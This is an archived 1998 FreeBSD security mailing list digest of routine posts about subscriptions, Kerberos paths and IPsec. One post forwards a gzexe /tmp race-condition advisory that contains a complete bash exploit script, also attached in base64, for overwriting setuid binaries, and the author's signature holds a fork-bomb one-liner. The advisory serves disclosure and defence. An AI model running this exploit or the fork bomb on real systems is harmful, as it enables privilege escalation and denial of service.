From owner-freebsd-security Tue Feb 3 04:19:35 1998 Return-Path: Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA14573 for security-outgoing; Tue, 3 Feb 1998 04:19:35 -0800 (PST) (envelope-from owner-freebsd-security) Received: from mgmt-server1.icscorp.com (mgmt-server1.icscorp.com [206.181.224.111]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id EAA14568 for ; Tue, 3 Feb 1998 04:19:34 -0800 (PST) (envelope-from tepkes@mgmt-server1.icscorp.com) Received: from tepkes.icscorp.com (unverified [206.181.224.80]) by mgmt-server1.icscorp.com (EMWAC SMTPRS 0.83) with SMTP id ; Tue, 03 Feb 1998 07:18:07 -0500 Message-Id: <3.0.5.32.19980203072102.007a9af0@mail.icscorp.com> X-Sender: tepkes@mail.icscorp.com X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Tue, 03 Feb 1998 07:21:02 -0500 To: freebsd-security@freebsd.org From: Tim Epkes Subject: mailing list Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I would like to get put onto this mailing list, please. Thanks From owner-freebsd-security Tue Feb 3 22:04:28 1998 Return-Path: Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA22222 for security-outgoing; Tue, 3 Feb 1998 22:04:28 -0800 (PST) (envelope-from owner-freebsd-security) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA22148; Tue, 3 Feb 1998 22:03:59 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id WAA11791; Tue, 3 Feb 1998 22:03:47 -0800 (PST) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaasbCa; Tue Feb 3 22:03:35 1998 Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id WAA26921; Tue, 3 Feb 1998 22:03:32 -0800 (PST) Message-Id: <199802040603.WAA26921@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpd026914; Wed Feb 4 06:03:23 1998 X-Mailer: exmh version 2.0.1 12/23/97 Reply-to: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: cy To: freebsd-security@freebsd.org cc: security-officer@freebsd.org Subject: GZEXE - the big problem Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Feb 1998 22:03:18 -0800 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Would this be a problem under FreeBSD? A subsequent posting by Theo de Raadt intimated that he had fixed the OpenBSD version. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 UNIX Support OV/VM: BCSC02(CSCHUBER) ITSD BITNET: CSCHUBER@BCSC02.BITNET Government of BC Internet: cschuber@uumail.gov.bc.ca Cy.Schubert@gems8.gov.bc.ca ------- Forwarded Message ** DESCRIPTION ** GZEXE, part of gzip package, is a small utility which allows 'transparent' compressio any kind of executables (just like pklite under ms-dos). Unfortunatelly, it may be extremally dangerous. Here's the shell script used to decompression: if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then... [...] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ /tmp/gztmp$$ ${1+"$@"}; res=3D$? ^^^^^^^^^^^^ Just look at this... An example of badly-written one ;) It's possible to overwrite any file (including SUIDs!) with code of gzexed executable when root executes it... Then, this unwanted suid may be easily = exploited. It's also possible to enforce execution of OUR OWN code instead of=20 gzexed program, just by choosing as a victim any file not owned by user running vunerable executables, but writable by him/her. This file (even setuid) may be freely modified by attacker... Whoops! ** EXPLOIT ** - -- GZEXE EXPLOIT -- #!/bin/bash # GZEXE executables exploit (gzip 1.2.4) # by Michal Zalewski (lcamtuf@staszic.waw.pl) # --------------------------------------------- VICTIM=3D/bin/ping GZEXED=3Da.out # Note: to locate gzexed executables you may use this: # find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut = - -f 1 -d " " if [ ! -f $VICTIM ]; then echo "I can't find my victim ($VICTIM)..." exit 0 fi ORIG=3D`ls -l $VICTIM|awk '{print \$5}'` echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)." renice +20 $PPID >&/dev/null cd /tmp touch $GZEXED while :; do START=3D`ps|awk '$6=3D=3D"ps"{print $1}'` =20 let START=3DSTART+100 let DO=3DSTART+100 while [ "$START" -lt "$DO" ]; do ln $VICTIM gztmp$START &>/dev/null let START=3DSTART+1 done sleep 10 rm -f gztmp* &>/dev/null NOWY=3D`ls -l $VICTIM|awk '{print \$5}'` if [ ! "$ORIG" =3D "$NOWY" ]; then echo "Done, my master." exit 0 fi =20 done - -- EOF -- It may be left in background, just like my gcc-exploit-2. Please verify vunerable executable filename (GZEXED - you may specify more than one file, separated by spaces). ** FIX ** DO NOT USE GZEXE TO COMPRESS EXECUTABLES. That's all, TMPDIR will NOT help in this case. _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] =3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] = - --------=3D - ------=_NextPart_000_004D_01BD2C35.8C227840 Content-Type: application/octet-stream; name="gzexeploit" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="gzexeploit" IyEvYmluL2Jhc2gKCiMgR1pFWEUgZXhlY3V0YWJsZXMgZXhwbG9pdCAoZ3ppcCAxLjIuNCkK IyBi eSBNaWNoYWwgWmFsZXdza2kgKGxjYW10dWZAc3Rhc3ppYy53YXcucGwpCiMgLS0tLS0tLS0t LS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpWSUNUSU09L2Jpbi9waW5nCkda RVhF RD1hLm91dAoKIyBOb3RlOiB0byBsb2NhdGUgZ3pleGVkIGV4ZWN1dGFibGVzIHlvdSBtYXkg dXNl IHRoaXM6CiMgZmluZCAvIC10eXBlIGYgLWV4ZWMgZ3JlcCAiL3RtcC9nenRtcFxcXCRcXFwk IFxc XCQiIHt9IFw7IC1wcmludHxjdXQgLWYgMSAtZCAiICIKCmlmIFsgISAtZiAkVklDVElNIF07 IHRo ZW4KICBlY2hvICJJIGNhbid0IGZpbmQgbXkgdmljdGltICgkVklDVElNKS4uLiIKICBleGl0 IDAK ZmkKCk9SSUc9YGxzIC1sICRWSUNUSU18YXdrICd7cHJpbnQgXCQ1fSdgCgplY2hvICJHWkVY RSBl eHBsb2l0IGxhdW5jaGVkIGFnYWluc3QgJFZJQ1RJTSAoJE9SSUcgYnl0ZXMpLiIKCnJlbmlj ZSAr MjAgJFBQSUQgPiYvZGV2L251bGwKCmNkIC90bXAKCnRvdWNoICRHWkVYRUQKCndoaWxlIDo7 IGRv CgogIFNUQVJUPWBwc3xhd2sgJyQ2PT0icHMie3ByaW50ICQxfSdgCiAgCiAgbGV0IFNUQVJU PVNU QVJUKzEwMAogIGxldCBETz1TVEFSVCsxMDAKCiAgd2hpbGUgWyAiJFNUQVJUIiAtbHQgIiRE TyIg XTsgZG8KICAgIGxuICRWSUNUSU0gZ3p0bXAkU1RBUlQgJj4vZGV2L251bGwKICAgIGxldCBT VEFS VD1TVEFSVCsxCiAgZG9uZQoKICBzbGVlcCAxMAoKICBybSAtZiBnenRtcCogJj4vZGV2L251 bGwK CiAgTk9XWT1gbHMgLWwgJFZJQ1RJTXxhd2sgJ3twcmludCBcJDV9J2AKCiAgaWYgWyAhICIk T1JJ RyIgPSAiJE5PV1kiIF07IHRoZW4KICAgIGVjaG8gIkRvbmUsIG15IG1hc3Rlci4iCiAgICBl eGl0 IDAKICBmaQogIApkb25lCg== - ------=_NextPart_000_004D_01BD2C35.8C227840-- ------- End of Forwarded Message From owner-freebsd-security Wed Feb 4 08:57:37 1998 Return-Path: Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA15926 for security-outgoing; Wed, 4 Feb 1998 08:57:37 -0800 (PST) (envelope-from owner-freebsd-security) Received: from ve7tcp.ampr.org (ve7tcp.ampr.org [198.161.92.132]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA15917 for ; Wed, 4 Feb 1998 08:57:29 -0800 (PST) (envelope-from lyndon@ve7tcp.ampr.org) Received: from localhost.ampr.org (localhost.ampr.org [127.0.0.1]) by ve7tcp.ampr.org (8.8.8/8.8.4) with SMTP id JAA28568 for ; Wed, 4 Feb 1998 09:57:22 -0700 (MST) Message-Id: <199802041657.JAA28568@ve7tcp.ampr.org> X-Authentication-Warning: ve7tcp.ampr.org: localhost.ampr.org [127.0.0.1] didn't use HELO protocol To: freebsd-security@freebsd.org Subject: /usr/include/kerberosIV X-Attribution: VE7TCP X-URL: http://ve7tcp.ampr.org/ Organization: The Frobozz Magic Homing Pigeon Company Date: Wed, 04 Feb 1998 09:57:22 -0700 From: Lyndon Nerenberg Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk More and more I get annoyed at the /usr/include/kerberosIV directory. Of all the Kerberos implementations I've dealt with it seems that these days the 4.4BSD derived systems are the only ones isolating the Kerberos 4 include files in this subdirectory. As a developer this is a minor but annoying pain in the *** in that it's necessary to special case software configuration scripts to deal with the non-orthagonal prefixes to the Kerberos include and lib directories on FreeBSD (and BSD/OS) systems. I'd like to propose that for 3.0 we follow the rest of the world and move the Kerberos 4 includes directly into /usr/include. We could leave a symlink behind to maintain souce compatibility with existing code that #includes . --lyndon From owner-freebsd-security Thu Feb 5 15:29:19 1998 Return-Path: Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA22515 for security-outgoing; Thu, 5 Feb 1998 15:29:19 -0800 (PST) (envelope-from owner-freebsd-security) Received: from serv.gtcs.com (serv.gtcs.com [206.54.69.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA22509 for ; Thu, 5 Feb 1998 15:29:18 -0800 (PST) (envelope-from root@gtcs.com) Received: from localhost (root@localhost) by serv.gtcs.com (8.8.5/8.6.12-2xx) with SMTP id QAA21250 for ; Thu, 5 Feb 1998 16:29:16 -0700 (MST) Date: Thu, 5 Feb 1998 16:29:16 -0700 (MST) From: Charlie ROOT To: freebsd-security@freebsd.org Subject: NIST ipsec distribution Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Just wondering if anyone else is working with the Linux distribution of ipsec (cerberus-0.1) from NIST. Bruce Gingery Advanced Integrators, LC From owner-freebsd-security Fri Feb 6 18:43:53 1998 Return-Path: Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA20795 for security-outgoing; Fri, 6 Feb 1998 18:43:53 -0800 (PST) (envelope-from owner-freebsd-security) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA20783; Fri, 6 Feb 1998 18:43:51 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id SAA13800; Fri, 6 Feb 1998 18:43:48 -0800 (PST) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaakyaa; Fri Feb 6 18:43:40 1998 Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id SAA16522; Fri, 6 Feb 1998 18:43:37 -0800 (PST) Message-Id: <199802070243.SAA16522@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpd016513; Sat Feb 7 02:43:00 1998 Reply-to: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Mailer: MH X-Sender: cy To: freebsd-security@freebsd.org cc: jmb@freebsd.org Subject: Test Date: Fri, 06 Feb 1998 18:42:59 -0800 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Since hub.freebsd.org came back online I haven't been receiving any freebsd-security messages. They show up on ftp.freebsd.org but not in my mailbox. This is a test. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 UNIX Support OV/VM: BCSC02(CSCHUBER) ITSD BITNET: CSCHUBER@BCSC02.BITNET Government of BC Internet: cschuber@uumail.gov.bc.ca Cy.Schubert@gems8.gov.bc.ca From owner-freebsd-security Sat Feb 7 16:07:45 1998 Return-Path: Received: (from daemon@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA27332 for security-outgoing; Sat, 7 Feb 1998 16:07:45 -0800 (PST) (envelope-from owner-freebsd-security) Received: from pegasus.rutgers.edu (pegasus.rutgers.edu [128.6.10.45]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA27327 for ; Sat, 7 Feb 1998 16:07:38 -0800 (PST) (envelope-from paradox@pegasus.rutgers.edu) Received: from wasteland (wasteland.rutgers.edu [128.6.32.75]) by pegasus.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) with SMTP id TAA13641 for ; Sat, 7 Feb 1998 19:07:37 -0500 Message-Id: <3.0.5.32.19980207190928.009435d0@pegasus.rutgers.edu> X-Sender: paradox@pegasus.rutgers.edu X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Sat, 07 Feb 1998 19:09:28 -0500 To: freebsd-security@freebsd.org From: Red Barchetta Subject: Kerberos authentication? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi all- I was discussing this with a few colleagues the other day, and I thought I'd run it by this list to try to get some feedback... I am interested in setting up a FreeBSD box as a Kerberos server for a small department (about 15 computers) composed of Suns, SGIs, and IBMs. I haven't yet done all of my homework, but my main questions are these: Is this feasible? Is there software available that will allow the 3 different OSes involved here (Solaris, IRIX, AIX) to authenticate logins to a 4th (FreeBSD), or would this require a large amount of custom programming on my part? The other thing I'd like to ask for is links/references that might be useful in such a venture. If this is too non-FreeBSD specific for continued discussion on the list, feel free to email me privately. Thanks! Ernie Pistor